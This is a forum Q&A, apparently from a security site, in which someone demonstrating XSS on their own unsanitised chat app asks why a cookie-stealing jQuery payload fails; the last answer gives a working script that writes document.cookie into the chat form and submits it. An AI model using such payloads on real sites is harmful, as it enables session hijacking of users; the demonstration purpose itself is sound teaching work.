# Using XSS to fill out inputs and submit them

Tags: web-applications, xss, javascript, jquery

I have a small web chat application that takes and input name and an input password and has a submit input as well and pastes it to a group.  Something like this:

```
<form method="post" action="whatever.php">
    <input type="text" name="input_name" value="Your Name"></input>
    <input type="text" name="input_text" value="Your Text"></input>
    <input type="submit" value="Submit"></input>
</form>
```

Anyway, there's no sanitization and typical XSS like

```
<script>alert('hi')</script>
```

Works perfectly on page load.  However, I want to demo session stealing and so I wrote this:

```
<script>
    $("input[name='input_name']").value = "User";
    $("input[name='input_text']").value = document.cookie;
    $("input[type='submit']").click();
</script>
```

Each jQuery statement runs perfectly from the console, but together, they don't execute on page load.  I'd like to get it to the point where I can show two users and one seeing the other's session information.  What am I missing in this xss attempt?  Thanks in advance!

Comment: I think you have a javascript problem. If the code runs directly, maybe the form isnt ready yet so you can not modify it. You need to wait for the hole page to load before you run the jQuery. [See this](https://learn.jquery.com/using-jquery-core/document-ready/).

Comment: If you want to use jQuery, remember to import the library.
I believe the order here is important as well, that the the jquery has to be loaded prior to your script .

Answer (score 1):

The script you gave is not firing any request as it isn't dealing with any form action. Try using [XMLHTTP requests](https://www.kirupa.com/html5/making_http_requests_js.htm) to fire the submit request.

Answer (score 0):

This works:

```
<script>var x=document.forms[0];x.input_name.value='user';
x.input_text.value=document.cookie;x.submit();</script>
```